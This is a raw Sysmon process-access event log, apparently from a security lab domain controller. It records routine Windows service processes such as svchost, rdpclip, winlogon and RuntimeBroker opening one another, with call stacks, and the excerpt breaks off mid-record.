10341000x800000000000000010144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.399{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.399{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 